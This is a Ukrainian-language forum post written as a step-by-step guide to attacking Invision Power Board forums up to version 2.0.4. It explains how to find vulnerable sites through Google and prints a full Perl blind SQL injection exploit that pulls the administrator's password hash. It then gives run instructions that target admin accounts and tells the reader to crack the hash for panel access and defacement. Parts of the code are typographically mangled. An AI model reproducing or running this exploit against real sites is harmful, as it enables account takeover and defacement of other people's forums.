Отже… Якщо чесно мене задалбали питаннями «як користуватися сплоитами»
Ну напевно почнемо

Вобщем покрокова інструкція як використовувати [b]exploit[/b]!
Запитаєте навіщо воно треба? Експлоиты — скрипти, що використовують уразливості порталів, форумів і т. д. За допомогою сплоита можна відвести хеші адміністратора форуму наприклад, щоб в подальшому мати достум до панелі адміністратора для керування форумом і дефейса.
Для прикладу будемо використовувати SQL-ін’єкцію в форумах IPB до версії 2.0.4 Вразливість звичайно стара, але діряві форуми в мережі були, є і будуть їсти.
Отже продовжимо.Для того щоб нам знайти відповідний форум ми природно залазимо в [b]Google[/b] даллее залазимо в розширений пошук і вводимо туди наш запит.Запит буде вигледеть так [b]Invision Power Board 2.0.4[/b] і ставимо значення 100 шуканих по слову сайтів, але по дефолту стоїть 10.

Отже ми знайшли форуми на яких стоять Invision Power Board 2.0.4.

Далі ми залазимо знову в Google і шукаємо exploit для Invision Power Board версії 2.0.4.

Отже ми знайшли наш сплоіт.А exploit виглядає так

use IO::Socket;

if (@ARGV < 4) { &usage; }

$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];

$pass = ($target)?(‘member_login_key’):(‘password’);

$server =~ s!(http://)!!;

$request = ‘http://’;
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;

print “[~] SERVER: $serverrn”;
print “[~] PATH: $pathrn”;
print “[~] MEMBER ID: $member_idrn”;
print “[~] TARGET: $target”;
print (($target)?(‘ — IPB 2.*’):(‘ — IPB 1.*’));
print «rn»;
print “[~] SEARCHING PASSWORD… [|]”;

($cmember_id = $member_id) =~ s/(.)/”%”.uc(sprintf(“%2.2 x”,ord($1)))/eg;

while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char==«0»)
{
if(length($allchar) > 0){
print qq{bb DONE ]

MEMBER ID: $member_id
};
print (($target)?(‘MEMBER_LOGIN_KEY: ‘):(‘ПАРОЛЬ: ‘));
print $allchar.«rn»;
}
else
{
print «bb FAILED ]»;
}
exit();
}
else
{
$allchar .= chr($i);
}
$s_num++;
}

sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

$r = int($fmax — ($fmax-$fmin)/2);
$check = “BETWEEN $r AND $fmax”;
if ( &check($check) ) { &found($r$fmax); }
else { &found($fmin,$r); }
}

sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = “=$i”;
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}

sub check($)
{
$n++;
status();
$ccheck = $_[0];
$pass_hash1 = “%36%36%36%2527%20%4F%52%20%28%69%64%3D”;
$pass_hash2 = “%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28”;
$pass_hash3 = $pass.”,”.$s_num.”,1))”.$ccheck.”) /*”;
$pass_hash3 =~ s/(.)/”%”.uc(sprintf(“%2.2 x”,ord($1)))/eg;
$nmalykh = “%20”;
$socket = IO::Socket::INET->new( Proto => «tcp», PeerAddr => “$server”, PeerPort => «80»);

printf $socket («GET %sindex.php?act=Login&CODE=autologin HTTP/1.0 nHost: %snAccept: */*nCookie: member_id=%s; pass_hash=%s%s%s%s%snConnection: closenn»,
$path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);

while()
{
if (/Set-Cookie: session_id=0;/) { return 1; }
}

return 0;
}

sub status()
{
$status = $n % 5;
if($status==0){ print «bb/]»; }
if($status==1){ print «bb-]»; }
if($status==2){ print «bb]»; }
if($status==3){ print «bb|]»; }
}

sub usage()
{
print q(
Invision Power Board v < 2.0.4 SQL injection exploit
—————————————————-
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]

[server] — host where IPB installed
[/folder/] — folder where IPB installed
[member_id] — user id for brute

targets:
0 — IPB 1.*
1 — IPB 2.* (Prior To 2.0.4)

e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
—————————————————-
©oded by 1dt.w0lf
RST/GHC, rst.void.ru, ghc.ru
);
exit();
}
[/b][/i]

Як ви зрозуміли exploit написаний на Perl/Щоб заюзать його нам потрібна прога під назву [b]ActivePerl[b]Скчати його можна [b][a href=«soft.softodrom.ru/ap/p478.shtml»]Тут[/a][b]

Отже, встановлений інтерпретатор. Запускаємо його:
Пуск->Виконати->cmd

У командному рядку набираємо:
C: путь_к_Perl C: путь_к_файлу_имя.pl сайт/папка_с_форумом/ 1 0

де:
C: путь_к_Perl — це шлях до файлу інтерпретатора, наприклад c:perlbinperl

C: путь_к_файлу_имя.pl — шлях до збереженого вами файлу з кодом сплоита

сайт — сайт форуму, доступ до якого ви хочете отримати наприклад lamer.com

папка_с_форумом — папка на сервері, куди встановлений движок форуму (дивіться в рядку URL броузера)

1 — id юзера, чий хеш ми хочемо відвести. оскільки нам потрібні адмінських хеши, ставимо одиницю, патамушто першими на форумі регисрируюца естессно адміни

0 — версія форуму яку ми хочемо взламать (0 — IPB 1.*, 1 — IPB 2.*)

Рядок cmd буде виглядати приблизно так:
c:perlbinperl c:ipb.pl terion.com /forum/ 1 0

Все, тиснемо Enter і чекаємо….
Якщо ви все зробили правильно, і форум не пропатчен, ми побачимо приблизно наступну картину:

r57ipb2.pl blah.com /ipb13/ 1 0
[~] SERVER: blah.com
[~] PATH: /ipb13/
[~] MEMBER ID: 1
[~] TARGET: 0 — IPB 1.*
[~] SEARCHING PASSWORD… [ DONE ]

MEМBER ID: 1
PASSWORD: 5f4dcc3b5aa765d61d8327deb882cf99

Ось сам хеш: 5f4dcc3b5aa765d61d8327deb882cf99
Тепер розшифровуємо його будь-яким можливим способом і отримуємо пароль адміністратора форуму…